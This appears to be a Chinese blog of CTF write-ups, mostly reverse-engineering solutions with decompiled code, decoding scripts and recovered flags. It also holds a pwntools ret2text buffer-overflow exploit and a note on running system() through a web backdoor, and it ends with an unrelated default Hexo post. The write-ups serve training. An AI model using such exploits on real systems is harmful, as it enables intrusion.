re

点击就送的逆向题

.S的文件 使用as命令来汇编一下，然后ida打开分析逻辑

as -o output.o input.S

置反一下逻辑

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+Ch] [rbp-54h]
  char s1[32]; // [rsp+10h] [rbp-50h] BYREF
  char s2[40]; // [rsp+30h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+58h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  strcpy(s2, "Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM");
  _isoc99_scanf(&unk_F4, s1);
  for ( i = 0; i <= 31; ++i )
    s1[i] += 7;
  if ( !strcmp(s1, s2) )
    printf("wrong!");
  puts("good!");
  return 0;
}

flag = "Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM"

for i in range(len(flag)):
    byte = ord(flag[i]) - 7
    print(chr(byte),end="")

SYC{SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF}

shiftjmp

有个jmp的花指令 nop掉后，对着main u p 重新打包main函数反编译

RE

Reverse入门指北

if ( *(_DWORD *)v7 == 13 )
   sub_401082(aMoectfF1rstSt3, v6);

aMoectfF1rstSt3 db 'moectf{F1rst_St3p_1s_D0ne}',0Ah,0

base_64

pycdc 下载 编译

发现是base64变种

http://web.chacuo.net/netbasex

把索引表复制进去解密拿到flag

UPX!

RE

easy_RE

确实是打开就有

flag{we1c0me_to_rev3rse!!}

elf

inputString 先异或然后+16 然后base64encode后和flag cmp，decode后-16 异或就好了

s1 = (char *)base64_encode(v6, v3);
  if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
  
 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

_BYTE *__fastcall encode(const char *a1)
{
  size_t v1; // rax
  int v2; // eax
  _BYTE *v4; // [rsp+20h] [rbp-20h]
  int i; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]

  v1 = strlen(a1);
  v4 = malloc(2 * v1 + 1);
  v6 = 0;
  for ( i = 0; i < strlen(a1); ++i )
  {
    v2 = v6++;
    v4[v2] = (a1[i] ^ 0x20) + 16;
  }
  v4[v6] = 0;
  return v4;
}

import base64

def custom_base64_decode(encoded_str):
    custom_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    standard_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    translation = str.maketrans(custom_base64_chars, standard_base64_chars)
    return base64.b64decode(encoded_str.translate(translation))

def xor(encoded_bytes):
    decoded_chars = []
    for byte in encoded_bytes:
        char = chr((byte - 16) ^ 0x20)
        decoded_chars.append(char)
    return ''.join(decoded_chars)


encoded_str = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
print(xor(custom_base64_decode(encoded_str)))

flag{D0_4ou_7now_wha7_ELF_1s?}

RE

crackme

运行就拿到flag了？看了一下是upx3.96

babyRe

反编译了一下，大概是这样一个逻辑，rsa

import libnum
from crypto.Util.number import *
flag = 'ISCTF{******************}'
flags = flag.encode()
e = 65537
p = libnum.generate_prime(1024)
q = libnum.generate_prime(1024)
n = p * q
m = bytes_to_long(flags)
c = pow(m, e, n)
output = open('output.txt', 'w')
output.write('p+q =' + str(p + q) + '\n')
output.write('(p+1)*(q+1)=' + str((p + 1) * (q + 1)) + '\n')
output.write('c=' + str(c) + '\n')
output.close()

from sympy import symbols, solve, isprime
from Crypto.Util.number import inverse, long_to_bytes


p_plus_q = 292884018782106151080211087047278002613718113661882871562870811030932129300110050822187903340426820507419488984883216665816506575312384940488196435920320779296487709207011656728480651848786849994095965852212548311864730225380390740637527033103610408592664948012814290769567441038868614508362013860087396409860

p_plus_1_q_plus_1 = 21292789073160227295768319780997976991300923684414991432030077313041762314144710093780468352616448047534339208324518089727210764843655182515955359309813600286949887218916518346391288151954579692912105787780604137276300957046899460796651855983154616583709095921532639371311099659697834887064510351319531902433355833604752638757132129136704458119767279776712516825379722837005380965686817229771252693736534397063201880826010273930761767650438638395019411119979149337260776965247144705915951674697425506236801595477159432369862377378306461809669885764689526096087635635247658396780671976617716801660025870405374520076160
ciphertext = 5203005542361323780340103662023144468501161788183930759975924790394097999367062944602228590598053194005601497154183700604614648980958953643596732510635460233363517206803267054976506058495592964781868943617992245808463957957161100800155936109928340808755112091651619258385206684038063600864669934451439637410568700470057362554045334836098013308228518175901113235436257998397401389511926288739759268080251377782356779624616546966237213737535252748926042086203600860251557074440685879354169866206490962331203234019516485700964227924668452181975961352914304357731769081382406940750260817547299552705287482926593175925396
e = 65537

n = p_plus_1_q_plus_1 - p_plus_q - 1

p, q = symbols('p q')
solutions = solve([p + q - p_plus_q, p*q - n], (p, q))
p, q = [int(sol) for sol in solutions[0] if isprime(sol)]

phi = (p - 1) * (q - 1)
d = inverse(e, phi)

m = pow(ciphertext, d, n)
flag = long_to_bytes(m).decode()
print(flag)

mfx_re

mfx? 搜索了一下，是修改了 upx的特征，把upx! 的字段修改成了mfx!，010edit中把文件里面几个mfx! 修改成upx! 就能用upx -d解压了，readelf -a也能看到符号表

关键逻辑是这里，++一下就好了

RE

PZthon

发现是python写的，先用 pyinstxtractor解包，然后将PZthon.pyc用pycdc反编译得到源码

# Source Generated with Decompyle++
# File: PZthon.pyc (Python 3.9)


def hello():
    art = '\n              ___                                                                      \n    //   ) )     / /    //   ) )  // | |     / /        // | |  \\ / / \\    / /       \n   //___/ /     / /    //        //__| |    / /        //__| |   \\  /   \\  / /        \n  / ____ /     / /    //  ____  / ___  |   / /        / ___  |   / /     \\/ /         \n //           / /    //    / / //    | |  / /        //    | |  / /\\     / /          \n//           / /___ ((____/ / //     | | / /____/ / //     | | / /  \\   / /           \n                                                                                       \n     / /        //   / / ||   / / //   / /  / /       /__  ___/ ||   / |  / / //   ) ) \n    / /        //____    ||  / / //____    / /          / /     ||  /  | / / //   / /  \n   / /        / ____     || / / / ____    / /          / /      || / /||/ / //   / /   \n  / /        //          ||/ / //        / /          / /       ||/ / |  / //   / /    \n / /____/ / //____/ /    |  / //____/ / / /____/ /   / /        |  /  | / ((___/ /     \n'
    print(art)
    return bytearray(input('Please give me the flag: ').encode())

enc = [
    115,
    121,
    116,
    114,
    110,
    76,
    37,
    96,
    88,
    116,
    113,
    112,
    36,
    97,
    65,
    125,
    103,
    37,
    96,
    114,
    125,
    65,
    39,
    112,
    70,
    112,
    118,
    37,
    123,
    113,
    69,
    79,
    82,
    84,
    89,
    84,
    77,
    76,
    36,
    112,
    99,
    112,
    36,
    65,
    39,
    116,
    97,
    36,
    102,
    86,
    37,
    37,
    36,
    104]
data = hello()
for i in range(len(data)):
    data[i] = data[i] ^ 21
if bytearray(enc) == data:
    print('WOW!!')
else:
    print('I believe you can do it!')
input('To be continue...')

异或一下拿到flag

enc = [
    115,
    121,
    116,
    114,
    110,
    76,
    37,
    96,
    88,
    116,
    113,
    112,
    36,
    97,
    65,
    125,
    103,
    37,
    96,
    114,
    125,
    65,
    39,
    112,
    70,
    112,
    118,
    37,
    123,
    113,
    69,
    79,
    82,
    84,
    89,
    84,
    77,
    76,
    36,
    112,
    99,
    112,
    36,
    65,
    39,
    116,
    97,
    36,
    102,
    86,
    37,
    37,
    36,
    104]

for i in enc:
    print(chr(i ^ 21),end="")

SMC

smc 顾名思义Self-Modifying Code，将代码加密，在运行的时候运行解密的函数，解密加密的代码

这里首先用了一个 VP函数改变了text段的权限，然后通过sub_401042() 里的逻辑，对加密的代码解密，只需要用idapy写一个解密的逻辑，然后转unk类型 转function类型，就能看到加密前的逻辑了

int __cdecl main(int argc, const char **argv, const char **envp)
{
  DWORD *v3; // eax

  v3 = (DWORD *)malloc(0x26u);
  VirtualProtect(&byte_403040, 0x26u, 0x40u, v3);
  puts("Please enter your flag:");
  sub_401025("%s", (char)&unk_4033D4);
  if ( NtCurrentPeb()->BeingDebugged )
  {
    MessageBoxA(0, "Debug Detected!", "Warning!", 0);
    Sleep(0x1388u);
    exit(0);
  }
  sub_401042();
  if ( ((int (__cdecl *)(void *, void *))byte_403040)(&unk_4033D4, &unk_403020) )
    puts("Win!");
  else
    puts("Lose!");
  return system("pause");
}

week1

Re

数字筑基

​

else
  {
    sub_401020((char *)&byte_402210, Arglist[0]);
    v4 = "0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}\n";
  }
  sub_401020(v4, Arglist[0]);
  system("pause");
  return 0;
}

0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}

代码金丹

v3 = strcmp(Arglist, "0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}");
if ( v3 )
  v3 = v3 < 0 ? -1 : 1;
v4 = (char *)&unk_4021B0;
if ( !v3 )
  v4 = (char *)&byte_40217C;
sub_401020(v4, Arglist[0]);

0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}

网络元婴

今天看一个ret2text的题目的时候，遇到了exp本地不通，远程通的奇怪问题，题目是这样的

有个backdoor函数是这样的

exp是这样的

from pwn import *
# p=remote("1.container.jingsai.apicon.cn",30509)
elf = context.binary = ELF('./Intruduce')
p = process()
context.log_level='debug'
payload=b'a'* (32 + 8)
backd00r=0x4011B6
payload+=p64(backd00r)
s=p.recvline() ; print(s)
print(s)
char=p.recv(1)
print(char)
p.sendline(payload)
p.interactive()

gdb调试了一下发现在call system的时候卡在了这个xmm寄存器里

搜索了一下，在这里找到了解决方法 https://blog.csdn.net/fjh1997/article/details/107695261

发现是glibc >= 2.27的时候 system函数里面会调用xmm寄存器，xmm寄存器要求16字节对齐，远程的环境应该是<2.27的所以可以直接打通，然后我本地的glibc版本是2.35的，所以会因为xmm寄存器内存对齐的原因导致exp打不通，只需要少push一个地址，内存就对齐了

附件 https://github.com/nyyyddddn/ctf/tree/main/Sictf2023%20%23Round%202

Reverse

[签到]PYC

电脑上的pycdc出问题了，就找个在线的

https://www.lddgo.net/string/pyc-compile-decompile

print(‘SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}’)

Myobject

rc4加解密，写个脚本

def rc4(key, plaintext):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]  # Swap values
    i = 0
    j = 0
    output = []
    for byte in plaintext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]  
        K = S[(S[i] + S[j]) % 256]
        output.append(byte ^ K)

    return output
key = [ord(char) for char in "SIFLAG"]
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')

full_ciphertext_27 = list(v18_bytes) + ciphertext_v19 + list(v20_bytes)

decrypted_full_combined = rc4(key, full_ciphertext_27)
decrypted_full_combined_string = ''.join([chr(byte) for byte in decrypted_full_combined])
print(decrypted_full_combined_string)

SICTF{wow_you_get_the_flag}

Web

[Baby] SignIn

查看源代码，script.js文件中有一段document.getElementById(‘flag’).addEventListener(‘click’, function()下面是一段jsfuck混淆

https://enkhee-osiris.github.io/Decoder-JSFuck/ 得到flag

[Baby] Backdoor

post传system()执行系统命令，找到flag

[Baby] Webpack

https://www.cnblogs.com/guowenrui/p/17023732.html 参考的这个文章

安装nodejs 用reverse-sourcemap .map文件还原找到flag

[Easy] Leak

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

$ hexo new "My New Post"

More info: Writing

Run server

$ hexo server

More info: Server

Generate static files

$ hexo generate